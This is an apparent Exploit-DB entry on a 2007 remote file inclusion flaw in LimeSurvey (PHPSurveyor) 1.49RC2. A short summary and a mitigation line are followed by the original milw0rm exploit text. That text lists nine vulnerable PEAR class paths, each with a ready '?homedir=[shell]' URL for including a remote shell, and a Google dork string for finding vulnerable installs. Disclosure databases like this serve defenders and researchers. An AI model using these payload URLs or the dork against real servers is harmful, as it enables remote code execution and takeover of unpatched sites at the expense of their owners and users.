header-logo
Suggest Exploit
vendor:
PHPSurveyor
by:
Pr0T3cT10n
7.5
CVSS
HIGH
RFI (Remote File Include)
CWE
Product Name: PHPSurveyor
Affected Version From: 1.49RC2
Affected Version To: 1.49RC2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

LimeSurvey (PHPSurveyor) RFI (Remote File Include) Vulnerability

The LimeSurvey (PHPSurveyor) script version 1.49RC2 is vulnerable to a Remote File Include (RFI) vulnerability. The vulnerability exists in multiple files, including /admin/classes/pear/OLE/PPS/File.php, /admin/classes/pear/OLE/PPS/Root.php, /admin/classes/pear/Spreadsheet/Excel/Writer.php, /admin/classes/pear/OLE/PPS.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php, /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php, and /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php. An attacker can exploit this vulnerability by including a remote file using the homedir parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to update the LimeSurvey (PHPSurveyor) script to a secure version that addresses the Remote File Include (RFI) vulnerability.
Source

Exploit-DB raw data:

## Owner : Pr0T3cT10n
## Email : Pr0T3cT10n@Gmail.Com
## Homepage : www.kamikaz-team.com
## Script site : www.limesurvey.org
## Script name : LimeSurvey (PHPSurveyor)
## Version : 1.49RC2
## Type : RFI(Remote File Include)
## Source : http://sourceforge.net/project/showfiles.php?group_id=74605
## D0rk : "You have not provided a survey identification number"

## Bug :
	## Files :
		## /admin/classes/pear/OLE/PPS/File.php
		## /admin/classes/pear/OLE/PPS/Root.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php
		## /admin/classes/pear/OLE/PPS.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php

## Exploit :
		## /admin/classes/pear/OLE/PPS/File.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS/Root.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=[shell]
		## /admin/classes/pear/OLE/PPS.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=[shell]
		## /admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=[shell]
		
## Thanks : str0ke

# milw0rm.com [2007-07-06]

Navigation

Suggest Exploit

Services By CQR